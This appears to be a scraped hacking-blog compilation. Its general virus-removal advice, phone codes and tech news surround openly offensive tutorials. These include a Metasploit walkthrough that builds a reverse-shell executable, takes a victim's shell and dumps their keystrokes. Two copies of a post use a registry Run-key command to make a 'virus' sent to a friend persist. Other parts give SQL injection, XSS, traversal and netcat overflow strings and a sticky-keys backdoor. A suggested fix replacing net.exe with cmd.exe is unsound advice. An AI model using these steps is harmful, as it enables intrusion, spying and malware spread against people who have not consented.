How to find or remove the Virus ?

How to find or remove the Virus ?

If you’ve let your guard down–or even if you haven’t–it can be hard to tell if your PC is infected. Here’s what to do if you suspect the worst.
Heard this one before? You must run antivirus software and keep it up to date or else your PC will get infected, you’ll lose all your data, and you’ll incur the wrath of every e-mail buddy you unknowingly infect because of your carelessness.

You know they’re right. Yet for one reason or another, you’re not running antivirus software, or you are but it’s not up to date. Maybe you turned off your virus scanner because it conflicted with another program. Maybe you got tired of upgrading after you bought Norton Antivirus 2001, 2002, and 2003. Or maybe your annual subscription of virus definitions recently expired, and you’ve put off renewing.

It happens. It’s nothing to be ashamed of. But chances are, either you’re infected right now, as we speak, or you will be very soon.
For a few days in late January, the Netsky.p worm was infecting about 2,500 PCs a day. Meanwhile the MySQL bot infected approximately 100 systems a minute (albeit not necessarily desktop PCs). As David Perry, global director of education for security software provider Trend Micro, puts it, “an unprotected [Windows] computer will become owned by a bot within 14 minutes.”

Today’s viruses, worms, and so-called bots–which turn your PC into a zombie that does the hacker’s bidding (such as mass-mailing spam)–aren’t going to announce their presence. Real viruses aren’t like the ones in Hollywood movies that melt down whole networks in seconds and destroy alien spacecraft. They operate in the background, quietly altering data, stealing private operations, or using your PC for their own illegal ends. This makes them hard to spot if you’re not well protected.

Is Your PC “Owned?”
I should start by saying that not every system oddity is due to a virus, worm, or bot. Is your system slowing down? Is your hard drive filling up rapidly? Are programs crashing without warning? These symptoms are more likely caused by Windows, or badly written legitimate programs, rather than malware. After all, people who write malware want to hide their program’s presence. People who write commercial software put icons all over your desktop. Who’s going to work harder to go unnoticed?

Other indicators that may, in fact, indicate that there’s nothing that you need to worry about, include:

* An automated e-mail telling you that you’re sending out infected mail. E-mail viruses and worms typically come from faked addresses.

* A frantic note from a friend saying they’ve been infected, and therefore so have you. This is likely a hoax. It’s especially suspicious if the note tells you the virus can’t be detected but you can get rid of it by deleting one simple file. Don’t be fooled–and don’t delete that file.

I’m not saying that you should ignore such warnings. Copy the subject line or a snippet from the body of the e-mail and plug it into your favorite search engine to see if other people have received the same note. A security site may have already pegged it as a hoax.



Sniffing Out an Infection

There are signs that indicate that your PC is actually infected. A lot of network activity coming from your system (when you’re not actually using Internet) can be a good indicator that something is amiss. A good software firewall, such as ZoneAlarm, will ask your permission before letting anything leave your PC, and will give you enough information to help you judge if the outgoing data is legitimate. By the way, the firewall that comes with Windows, even the improved version in XP Service Pack 2, lacks this capability.

To put a network status light in your system tray, follow these steps: In Windows XP, choose Start, Control Panel, Network Connections, right-click the network connection you want to monitor, choose Properties, check “Show icon in notification area when connected,” and click OK.

If you’re interested in being a PC detective, you can sniff around further for malware. By hitting Ctrl-Alt-Delete in Windows, you’ll bring up the Task Manager, which will show you the various processes your system is running. Most, if not all, are legit, but if you see a file name that looks suspicious, type it into a search engine and find out what it is.

Want another place to look? In Windows XP, click Start, Run, type
“services.msc” in the box, and press Enter. You’ll see detailed descriptions of the services Windows is running. Something look weird? Check with your search engine.

Finally, you can do more detective work by selecting Start, Run, and typing “msconfig” in the box. With this tool you not only see the services running, but also the programs that your system is launching at startup. Again, check for anything weird.

If any of these tools won’t run–or if your security software won’t run–that in itself is a good sign your computer is infected. Some viruses intentionally disable such programs as a way to protect themselves.



What to Do Next
Once you’re fairly sure your system is infected, don’t panic. There are steps you can take to assess the damage, depending on your current level of protection.

* If you don’t have any antivirus software on your system (shame on you), or if the software has stopped working, stay online and go for a free scan at one of several Web sites. There’s McAfee FreeScan, Symantec Security Check, and Trend Micro’s HouseCall. If one doesn’t find anything, try two. In fact, running a free online virus scan is a good way to double-check the work of your own local antivirus program. When you’re done, buy or download a real antivirus program.

* If you have antivirus software, but it isn’t active, get offline, unplug wires– whatever it takes to stop your computer from communicating via the Internet. Then, promptly perform a scan with the installed software.

* If nothing seems to be working, do more research on the Web. There are several online virus libraries where you can find out about known viruses. These sites often provide instructions for removing viruses–if manual removal is possible–or a free removal tool if it isn’t. Check out GriSOFT’s Virus Encyclopedia, Eset’s Virus Descriptions, McAffee’s Virus Glossary, Symantec’s Virus Encyclopedia, or Trend Micro’s Virus Encyclopedia.


A Microgram of Prevention
Assuming your system is now clean, you need to make sure it stays that way. Preventing a breach of your computer’s security is far more effective than cleaning up the mess afterwards. Start with a good security program, such Trend Micro’s PC-Cillin, which you can buy for $50.

Don’t want to shell out any money? You can cobble together security through free downloads, such as AVG Anti-Virus Free Edition, ZoneAlarm (a personal firewall), and Ad-Aware SE (an antispyware tool).

Just make sure you keep all security software up to date. The bad guys constantly try out new ways to fool security programs. Any security tool without regular, easy (if not automatic) updates isn’t worth your money or your time.

Speaking of updating, the same goes for Windows. Use Windows Update (it’s right there on your Start Menu) to make sure you’re getting all of the high priority updates. If you run Windows XP, make sure to get the Service Pack 2 update. To find out if you already have it, right-click My Computer, and select Properties. Under the General tab, under System, it should say “Service Pack 2.”


Here are a few more pointers for a virus-free life:
* Be careful with e-mail. Set your e-mail software security settings to high. Don’t open messages with generic-sounding subjects that don’t apply specifically to you from people you don’t know. Don’t open an attachment unless you’re expecting it.

* If you have broadband Internet access, such as DSL or cable, get a router, even if you only have one PC. A router adds an extra layer of protection because your PC is not connecting directly with the Internet.

* Check your Internet ports. These doorways between your computer and the Internet can be open, in which case your PC is very vulnerable; closed, but still somewhat vulnerable; or stealthed (or hidden), which is safest. Visit Gibson Research’s Web site and run the free ShieldsUP test to see your ports’ status. If some ports show up as closed–or worse yet, open–check your router’s documentation to find out how to hide them.







Hope you like this post if you liked it do share this with your friends .

CMD in single click :)

Open CMD with right click

If you don’t already have a quick launch icon or a hotkey set to open a command prompt, there’s really quick trick that you can do on any Windows 7 or Vista computer to open up a command prompt without having to navigate the menu.
Just hold down the Shift key and right-click on the desktop…

And then you can choose “Open Command Window Here” from the menu. The great thing about this is that the current path is the desktop, which is convenient for manipulating files on the desktop.

Of course you can always right-click on any folder icon in the system while holding down the shift key:

Or inside any folder:

Exploitation

Exploiting Windows 7 Remote Computer Using Metasploit Framework

 Today I’ll tell u how to exploit any remote machine of Windows 7..

The steps are as follows..

First of all , start backtrack 5 and type “startx” to start the GUI mode:
root@bt:~#startx
The by default username and password is
Username: root
Pass: toor
To know your Local Ip. Opening up a konsole (on the bottom left of taskbar) and typing in:
root@bt:~#ifconfig

Launch msfconsole by going to Applications>>Backtrack>>Exploitation Tools>>Network Exploitation Tools>>Metasploit Framework>>msfconsole

 

 

 Let’s now create an executable file which establishes a remote connection between the victim and us, using the meterpreter payload.
Open another shell window

 

root@bt:/opt/framework3/msf3# ./msfpayload windows/meterpreter/reverse_tcp LHOST=xxx.xxx.xxx.xxx LPORT=anyportno x > /root/reverse_tcp.exe
Your local IP is the one you noted earlier and for port you could select anything.
You will get like this:

 Also, now on your backtrack desktop, you would be seeing a reverse_tcp.exe file.

 

 

Now open the 1st shell window with msfconsole in it.
msf >
Type the following:
msf > use exploit/multi/handler

 

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST xxx.xxx.xxx.xxx
LHOST => xxx.xxx.xxx.xxx
msf exploit(handler) > set LPORT 4444
LPORT => 4444

 All the connections are done. You have already made an executable file which makes a reverse connection to you.
And now, you have set the meterpreter to listen to you on port 4444.
The last step you have to do now, is to type in “exploit” and press enter,
msf exploit(handler) > exploit

You would see a meterpreter prompt like this
meterpreter >
Type in ps to list the active processes
meterpreter > ps
Search for explorer.exe and migrate to the process

 meterpreter > migrate 2028
[*] Migrating to 2028…
[*] Migration completed successfully.
meterpreter >

Type in the following:
meterpreter > use priv

 Now, if you want to start the Keylogger activity on victim, just type keyscan_start

Now, if you want to go to the victim’s computer,
Jus type shell
meterpreter > shell
Process 844 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

You would now be having a command prompt,
Type in whoami, to see the computer’s name of victim :
C:\Windows\system32>whoami
whoami
kyrion-pc\kyrion
C:\Windows\system32

Let’s suppose you want to start a notepad on the victim’s computer.
Type in:
Let’s say the victim has typed in anything on his computer.
Just type exit, to return to meterpreter.
Now type in keyscan_dump, to see all the typed keystrokes :
meterpreter > keyscan_dump
Dumping captured keystrokes…

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.


So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.


So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up.

1. Open a Notepad file
2. Write down the following command
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe
3. Now save the notepad file with any name say DESTROY but extension should be bat. Means we will have to create a batch file eg: DESTROY.bat
4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.
5. Now the impact of the virus will also be visible after the restart of the system.

Zenmap

Working Of Zenmap (Network Scanning Tool)

Zenmap is the official graphical user interface (GUI) for the Nmap Security Scanner. It is a multi-platform, free and open-source application designed to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scans can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database.


CHOSEN SETUP

As Zenmap runs on a windows/Linux so i chose the following setup :
 Windows  OS – Windows 7 installed on a system
 Version- Zenmap 6 (http://nmap.org/dist/nmap-6.00-setup.exe)

Scanning
Begin Zenmap by typing zenmap in a terminal or by clicking the Zenmap icon in the desktop environment.
Firstly, select the Target. Target could be any domain name or the IP Address, so right now my target is  10.0.0.2.

Profile:

 

Profile combo box. Profiles exist for several common scans. After selecting a profile the Nmap command line associated with it is displayed on the screen. Of course, it is possible to edit these profiles or create new ones.
It is also possible to type in an Nmap command and have it executed without using a profile. Just type in the command and press return or click “Scan”.

 In Zenmap there are 10 Types of Profile :
a.  INTENSE SCAN
Command = nmap -T4 -A 10.0.0.2
Description  = An intense, comprehensive scan. The -A option enables OS detection (-O), version detection (-sV), script scanning (-sC), and traceroute (–traceroute). Without root privileges only version detection and script scanning are run. This is considered an intrusive scan.

SCAN RESULT TABS
Each scan window contains five tabs which each display different aspects of the scan results. They are:
a) Nmap Output
b) Ports / Hosts
c) Topology
d) Host Details

Each of these are discussed in this section:
NMAP OUTPUT
The “Nmap Output” tab is displayed by default when a scan is run. It shows the familiar Nmap terminal output.

PORT/HOSTS
When a service is selected, the “Ports / Hosts” tab shows all the hosts which have that port open or filtered. This is a good way to quickly answer the question “What computers are running HTTP?”

 

TOPOLOGY

The “Topology” tab is an interactive view of the connections between hosts in a network.

HOST DETAILS
The “Host Details” tab breaks all the information about a single host into a hierarchical display. Shown are the host’s names and addresses, its state (up or down), and the number and status of scanned ports. The host’s uptime, operating system, OS icon. When no exact OS match is found, the closest matches are displayed.

Web Scarab

Web Scarab: Introduction

WebScarab is a framework for analyzing web application which is written in Java, so that’s why it is portable to many platforms. WebScarab communicates by using HTTP and HTTPS protocols. WebScarab has several modes of operation, implemented by a number of plugins. In its most common usage, WebScarab operates as an intercepting proxy, allowing the operator to review and modify requests created by the browser before they are sent to the server, and to review and modify responses returned from the server before they are received by the browser. WebScarab is able to intercept both HTTP and HTTPS communication. The operator can also review the conversations (requests and responses) that have passed through WebScarab.


WebScarab is designed to be a tool for anyone who needs to expose the workings of an HTTP(S) based application, whether to allow the developer to debug otherwise difficult problems, or to allow a security specialist to identify vulnerabilities in the way that the application has been designed or implemented.

 

Features:

• Fragments - Extracts Scripts and HTML comments from HTML pages as they are seen via the proxy, or other plugins.

• Proxy – Observes traffic between the browser and the web server. The WebScarab proxy is able to observe both HTTP and encrypted HTTPS traffic, by negotiating an SSL connection between WebScarab and the browser instead of simply connecting the browser to the server and allowing an encrypted stream to pass through it. Various proxy plugins have also been developed to allow the operator to control the requests and responses that pass through the proxy.

• Manual Intercept - Allows the user to modify HTTP and HTTPS requests and responses on the fly, before they reach the server or browser.

• BeanShell – Allows for the execution of arbitrarily complex operations on requests and responses. Anything that can be expressed in Java can be executed.

• Reveal Hidden Fields – Sometimes it is easier to modify a hidden field in the page itself, rather than intercepting the request after it has been sent. This plugin simply changes all hidden fields found in HTML pages to text fields, making them visible, and editable.

• Bandwidth Simulator – Allows the user to emulate a slower network, in order to observe how their website would perform when accessed over, say, a modem.

• Spider - Identifies new URLs on the target site, and fetches them on command.

• Manual Request – Allows editing and replay of previous requests, or creation of entirely new requests.

• SessionID Analysis – Collects and analyzes a number of cookies to visually determine the degree of randomness and unpredictability. Note that this analysis is rather trivial, and does not do any serious checks, such as FIPS, etc.

• Scripted – Operators can use BeanShell (or any other BSF supported language found on the classpath) to write a script to create requests and fetch them from the server. The script can then perform some analysis on the responses, with all the power of the WebScarab Request and Response object model to simplify things.

• Parameter Fuzzer – Performs automated substitution of parameter values that are likely to expose incomplete parameter validation, leading to vulnerabilities like Cross Site Scripting (XSS) and SQL Injection.

• Search – Allows the user to craft arbitrary BeanShell expressions to identify conversations that should be shown in the list.

• Compare - Calculates the edit distance between the response bodies of the conversations observed, and a selected baseline conversation. The edit distance is “the number of edits required to transform one document into another”. For performance reasons, edits are calculated using word tokens, rather than byte by byte.

• SOAP – There is a plugin that parses WSDL, and presents the various functions and the required parameters, allowing them to be edited before being sent to the server.
  NOTE: This plugin is deprecated, and may be removed in the future. SOAPUI is streets beyond anything that Webscarab can do, or will ever do, and is also a free tool.

• Extensions – Automates checks for files that were mistakenly left in web server’s root directory (e.g. .bak, ~, etc). Checks are performed for both, files and directories (e.g. /app/login.jsp will be checked for /app/login.jsp.bak, /app/login.jsp~, /app.zip, /app.tar.gz, etc). Extensions for files and directories can be edited by user.

• XSS/CRLF – Passive analysis plugin that searches for user-controlled data in HTTP response headers and body to identify potential CRLF injection (HTTP response splitting) and reflected cross-site scripting (XSS) vulnerabilities.

 

Startup Virus

Execute virus on Start up

Hello guys,
You must be familiar with viruses and probably you must be knowing how we can create them. Once the virus get executed it will show its impact but it will last till the system is turn on, If you will turn off the system all the process of the virus will also get killed.


So our requirement is to run our virus again even if the system get rebooted. So for that we will have to send our virus on start up. But we don’t want to send it manually instead of that we would like to send it with the help of batch file.

So let us take we are having a virus demo.exe.

Follow the following steps for sending it on Start up:


1. Open a Notepad file.

2. Write down the following command.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v demo /t REG_SZ /d demo.exe

3. Now save the notepad file with any name say kyrion but extension should be bat. Means we will have to create a batch file eg: kyrion.bat

4. Now send kyrion.bat along with demo.exe virus to your friend. Whenever he will click on kyrion.bat file automatically demo.exe will reach at the start up.

5. Now the impact of the virus will also be visible after the restart of the system.

 

Hack Nokia

Nokia Mobile Phone HACK Codes

1.  Imagine ur cell battery is very low, u r expecting an important call and u don’t have a charger.
     Nokia instrument comes with a reserve battery. To activate, key is “*3370#”
     Ur cell will restart with this reserve and ur instrument will show a 50% increase in battery.
      This reserve will get charged when u charge ur cell next time.

     *3370# Activate Enhanced Full Rate Codec (EFR)-Your phone uses the best sound quality but talk time is reduced by approx 5%
     #3370# Deactivate Enhanced Full Rate Codec( EFR)
     *#4720# Activate Half Rate Codec – Your phone uses a lower quality sound but you should gain approx 30% more Talk Time
    *#4720# Deactivate Half Rate Codec

2.  *#0000# Displays your phones software version,
      1st Line :  Software Version,
      2nd Line : Software Release Date,
      3rd Line : Compression Type

3.  *#9999# Phones software version if *#0000# does not work.

4.  *#06# For checking the International Mobile Equipment Identity (IMEI Number).

5.  #pw+1234567890+1# Provider Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

6.  #pw+1234567890+2# Network Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

7.  #pw+1234567890+3# Country Lock Status. (use the “*” button to obtain the “p,w” and “+” symbols).

8.  #pw+1234567890+4# SIM Card Lock Status.(use the “*” button to obtain the “p,w” and “+” symbols).

9.  *#147# (vodafone) this lets you know who called you last *#1471# Last call (Only vodofone).

10.  *#21# Allows you to check the number that “All Calls” are diverted to.

11.  *#2640# Displays security code in use. 

12.  *#30# Lets you see the private number.

13.  *#43# Allows you to check the “Call Waiting” status of your phone.

14.  *#61# Allows you to check the number that “On No Reply” calls are diverted to.

15.  *#62# Allows you to check the number that “Divert If Unreachable(no service)” calls are diverted to.

16.  *#67# Allows you to check the number that “On Busy Calls” are diverted to.

17.  *#67705646# removes operator logo on 3310 & 3330

18.  *#73# Reset phone timers and game scores

19.  *#746025625# Displays the SIM Clock status, if your phone supports this power saving feature “SIM Clock Stop Allowed”, it means you will get the best standby time possible

20.  *#7760# Manufactures code

21.  *#7780# Restore factory settings

22.  *#8110# Software version for the nokia 8110

23.  *#92702689# (to remember *#WARRANTY#)
      Displays -
      1. Serial Number,
      2.Date Made
      3.Purchase Date,
      4.Date of last repair (0000 for no repairs),
      5.Transfer User Data.
      To exit this mode -you need to switch your phone off then on again

24.  *#94870345123456789# Deactivate the PWM-Mem

25.  **21*number# Turn on “All Calls” diverting to the phone number entered

26.  **61*number# Turn on “No Reply” diverting to the phone number entered

27.  **67*number# Turn on “On Busy” diverting to the phone number entered

  Each command is prefixed with either one or two * or # characters as follows:
   ** Register and Activate
   * Activate  
    ## De-Register (and Deactivate)
    # Deactivate
    *# Check Status
    © Call button

Once each command has been entered, if it is a network command (as opposed to a local handset command) it must be transmitted to the network by pressing the YES (receiver) key which acts as an enter key – this is represented here with the © character. Always enter numbers in full international format +CountryAreaNumber ( e.g. +447712345678).


Security
Change call barring code **03*OldCode*NewCode*NewCode#©
Change call barring code **03*330*OldCode*NewCode*NewCode#©
Change PIN code **04*OldPIN*NewPIN*NewPIN#©
Change PIN2 code **042*OldPIN2*NewPIN2*NewPIN2#©
Unlock PIN code (when PIN is entered wrong 3 times) **05*PUK*NewPIN*NewPIN#©
Unlock PIN2 code (when PIN2 is entered wrong 3 times) **052*PUK2*NewPIN2*NewPIN2#©

Display IMEI *#06#

Call Forwarding (Diversions)
De-register all call diversions ##002#©
Set all configured call diversions to number and activate **004*number#©
De-register all configured call diversions (no answer, not reachable, busy) ##004#©

Unconditionally divert all calls to number and activate **21*number#©
Activate unconditionally divert all calls *21#©
De-register unconditionally divert all calls ##21#©
Deactivate unconditionally divert all calls #21#©
Check status of unconditionally divert all calls *#21#©
Divert on no answer to number and activate **61*number#©
Activate divert on no answer *61#©
De-register divert on no answer ##61#©
Deactivate divert on no answer #61#©
Check status of divert on no answer *#61#©
Divert on not reachable to number and activate **62*number#©
Activate divert on not reachable *62#©
De-register divert on not reachable ##62#©
Deactivate divert on not reachable #62#©
Check status of divert on not reachable *#62#©
Divert on busy to number and activate  **67*number#©
Activate divert on busy *67#©
De-register divert on busy ##67#©
Deactivate divert on busy #67#©
Check status of divert on busy *#67#©
Change number of seconds of ringing for the given service before diverting a call (such as on no answer). Seconds must be a value from 5 to 30. De-registering the same divert will also delete this change! **service*number**seconds#© (Service numbers, see below)
Call barring

Activate barring all outgoing calls (see Security to set code) **33*code#©
Deactivate barring all outgoing calls #33*code#©
Check status of barring all outgoing calls *#33#©
Activate barring all calls **330*code#©
Deactivate barring all calls #330*code#©
Check status of barring all calls *#330*code#©
Activate barring all outgoing international calls **331*code#©
Deactivate barring all outgoing international calls #331*code#©
Check status of barring all outgoing international calls *#331#©
Activate barring all outgoing international calls except to home country **332*code#©
Deactivate barring all outgoing international calls except to home country #332*code#©
Check status of barring all outgoing international calls except to home country *#332#©
Activate barring all outgoing calls **333*code#©
Deactivate barring all outgoing calls #333*code#©
Check status of barring all outgoing calls *#333#©
Activate barring all incoming calls **35*code#©
Deactivate barring all incoming calls #35*code#©
Check status of barring all incoming calls *#35#©
Activate barring all incoming calls when roaming **351*code#©
Deactivate barring all incoming calls when roaming #351*code#©
Check status of barring all incoming calls when roaming *#351#©
Activate barring all incoming calls **353*code#©
Deactivate barring all incoming calls #353*code#©
Check status of barring all incoming calls *#353#©

Call waiting
Activate call waiting *43*#©
Deactivate call waiting #43##©
Check status of call waiting *#43#©
Calling Line Identification
The following only works if CLIP and CLIR are enabled (ask your service provider)

CLIP: Presentation of the number of the incoming call
Activate CLIP **30#©
Deactivate CLIP ##30#©
Check status of CLIP *#30#©
CLIR: Presentation of one’s own number to the to the called party
Activate CLIR **31#©
Activate CLIR for the actual call *31#number©
Deactivate CLIR ##31#©
Deactivate CLIR for the actual call #31#number©
Check status of CLIR *#31#©
COLP: Presentation of the actual number reached (if number called was diverted to another number
Activate COLP *76#©
Deactivate COLP #76#©
Check status of COLP *#76#©
COLR: Presentation of the original number called by the calling party (if the call was diverted to this cellphone)
Activate COLR *77#©
Deactivate COLR #77#©
Check status of COLR *#77#©

CAPTCHA

What is CAPTCHA and How it Works?

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

 

Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.


What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.


What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.


Who Uses CAPTCHA?

CAPTCHAs are mainly used by websites that offer services like online polls and registration forms. For example, Web-based email services like Gmail, Yahoo and Hotmail offer free email accounts for their users.
However upon each sign-up process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam mail accounts.


Designing a CAPTCHA System:

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify.
Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.

Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer.


Breaking the CAPTCHA:

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.

 

Input Validation Attacks

What are Input Validation Attacks?

Input Validation Attacks :-

Input Validation Attacks are where an attacker intentionally sends unusual input in the hopes of confusing the application.
The most common input validation attacks are as follows-

1) Buffer Overflow :- Buffer overflow attacks are enabled due to sloppy programming or mismanagement of memory by the application developers. Buffer overflow may be classified into stack overflows, format string overflows, heap overflows and integer overflows. It may possible that an overflow may exist in language’s (php, java, etc.) built-in functions.

To execute a buffer overflow attack, you merely dump as much data as possible into an input field. The attack is said to be successful when it returns an application error. Perl is well suited for conducting this type of attack.

Here’s the buffer test, calling on Perl from the command line:
$ echo –e “GET /login.php?user=\
> `perl –e ‘print “a” x 500’`\nHTTP/1.0\n\n” | \
nc –vv website 80

This sends a string of 500 “a” characters for the user value to the login.php file.

Buffer overflow can be tested by sending repeated requests to the application and recording the server’s response.


2) Canonicalization :- These attacks target pages that use template files or otherwise reference alternate files on the web server.

 The basic form of this attack is to move outside of the web document root in order to access system files, i.e., “../../../../../../../../../boot.ini”. This type of functionality is evident from the URL and is not limited to any one programming language or web server. If the application does not limit the types of files that it is supposed to view, then files outside of the web document root are targeted, something like following-

/menu.asp?dimlDisplayer=menu.asp
/webacc?User.asp=login.htt
/SWEditServlet?station_path=Z&publication_id=2043&template=login.tem
/Getfile.asp?/scripts/Client/login.js
/includes/printable.asp?Link=customers/overview.htm


3) Cross-site Scripting (XSS) :- Cross-site scripting attacks place malicious code, usually JavaScript, in locations where other users see it. Target fields in forms can be addresses, bulletin board comments, etc.

We have found that error pages are often subject to XSS attacks. For example, the URL for a normal application error looks like this:
http://website/inc/errors.asp?Error=Invalid%20password
This displays a custom access denied page that says, “Invalid password”. Seeing a string
on the URL reflected in the page contents is a great indicator of an XSS vulnerability. The attack would be created as:
http://website/inc/errors.asp?Error=<script%20src=…
That is, place the script tags on the URL.


4) SQL Injection :- This kind of attack occurs when an attacker uses specially crafted SQL queries as an input, which can open up a database. Online forms such as login prompts, search enquiries, guest books, feedback forms, etc. are specially targeted.

The easiest test for the presence of a SQL injection attack is to append “or+1=1” to the URL and inspect the data returned by the server.
example:- http://www.domain.com/index.asp?querystring=sports’ or 1=1–

Sticky Key Attack Security

Secure your Computer by Sticky Key Attack

Hello Guys,
 This Time I wanna tell you some more about the Sticky keys Attack  i.e. totally about making a backdoor  in other system by replacing sethc.exe file with cmd.exe and after that u have to press Shift key 5 times on login screen and you get the cmd or command Prompt on login screen and run the ‘net user ’ command to change the password  of administrator or any account in the system. This is all about the attack, now how can U Secure ur system by this attack for that you have to follow few steps as follows:


Windows XP:

1. Check for sticky key backdoor “By pressing sticky key  5 times on login screen ”  whenever  you turn on the computer .
2. Turn off the sticky Keys .
3. Or you can use this step to disable the ‘net user’ command, so that if anybody make a backdoor  in your system but he can’t change your password .
   1. Open the folder c:\windows\system32
   2.  Search for ‘Net.exe’ over there and replace it with ‘cmd.exe’ or with any other ‘.exe’ file.
   3. Open the file by inserting this address c:\windows\system32\dllcache on file browser manually and change the ‘net.exe’ with ‘cmd.exe’ or any other ‘.exe’ file.

Windows 7:

1. Check for sticky key backdoor “By pressing sticky key  5 times on login screen ”  whenever  you turn on the computer .
2. Turn off the sticky Keys .
3. Or you can use this step to disable the ‘net user’ command, so that if anybody make a backdoor  in your system but he can’t change your password .
   1. Open the folder c:\windows\system32
   2. Search for ‘Net.exe’ over there and replace it with ‘cmd.exe’ or with any other ‘.exe’ file.
   3. Open the file by inserting this C:\Windows\winsxs\x86_microsoft-windows-net-command-line-tool_31bf3856ad364e35_6.1.7600.16385_none_5208a7a3d3caa54c on file browser manually and change the ‘net.exe’ with ‘cmd.exe’ or any other ‘.exe’ file.
    

Facebook Trick

Hello Guys,

This post of mine is just to make yourself easy with handling your social life. Here I will be telling you various shortcuts for Facebook in Google Chrome & Mozilla Firefox browser.


Chrome        Firefox             Facebook

Alt+m                      Shift+Alt+m               New Message
Alt+0                       Shift+Alt+0                Help Center
Alt+1                       Shift+Alt+1                Home Page
Alt+2                       Shift+Alt+2                Profile Page
Alt+3                       Shift+Alt+3                Manage Friend List
Alt+4                       Shift+Alt+4                Message List
Alt+5                       Shift+Alt+5                Notification Page
Alt+6                       Shift+Alt+6                Account Settings
Alt+7                       Shift+Alt+7                Privacy Settings
Alt+8                       Shift+Alt+8                Facebook Fan Page
Alt+9                       Shift+Alt+9                Facebook Terms
Alt+?                       Shift+Alt+?                  Search Box

Scroogled

Microsft’s New Website: www.scroogled.com (Short form of Screw Google.com)

In a vicious attack on Google, Microsoft has alleged that the company violates the privacy of Gmail users by reading their emails to serve up advertisements.

Microsoft, which competes with Google, has also launched a website – www.scroogled.com – that talks about “Google’s practice of going through the contents of all Gmail emails to sell and target ads”.

Justification by google Said: No humans went through the mails; only algorithms determined the ads.

Stefan Weitz, Microsoft’s senior director of online services, said, “Emails are personal and people feel reading… their emails to sell ads is out of bounds… We are concerned that Google violates privacy every time an Outlook.com user exchanges messages with someone on Gmail.”


Advertising allows co to offer free services: Google
Launching an attack on Google, Stefan Weitz, Microsoft’s senior director of online services, said “This campaign is as much about protecting Outlook.com users from Gmail as it is about making sure Gmail users know what Google’s doing,” he said.

Commenting on Microsoft’s campaign, a Google spokesperson said that advertising allows the company to offer free services. “Advertising keeps Google and many of the websites and services Google offers free of charge… We work hard to make sure that ads are safe, unobtrusive and relevant,” said Samantha Smith, a Google spokesperson.

“No humans read your email or Google Account information in order to show you advertisements or related information. An automated algorithm determines which ads are shown,” added a Google official.

Personalised advertisements have been a part of the web for several years now and are considered industry practice. Websites like Google and Facebook not only track web users when they are logged into their network but also keep an eye on the content they produce through automated processes. In this way, these websites figure out keywords and serve advertisements that users may need.

In fact, Microsoft too shows personalized advertisements across its websites, including on outlook.com. The company also reads emails landing up in an outlook.com mailbox but claims that it is done to filter out spam.
Google had earlier said that its computers also scan the user-generated content to make services more relevant to users. One example of such service is Google Now, a virtual assistant available on Android phones, which can automatically track a shipment for user after scanning the tracking number in emails that courier companies send.

This is not the first time Microsoft has launched a ‘scroogled’ attack on Google. Last year, Microsoft tried to “educate” web users about Google Shopping, a search engine specific for products. Earlier in 2012, the company created a goofy video in which a person called ‘Gmail Man’ was shown reading messages before they got delivered.

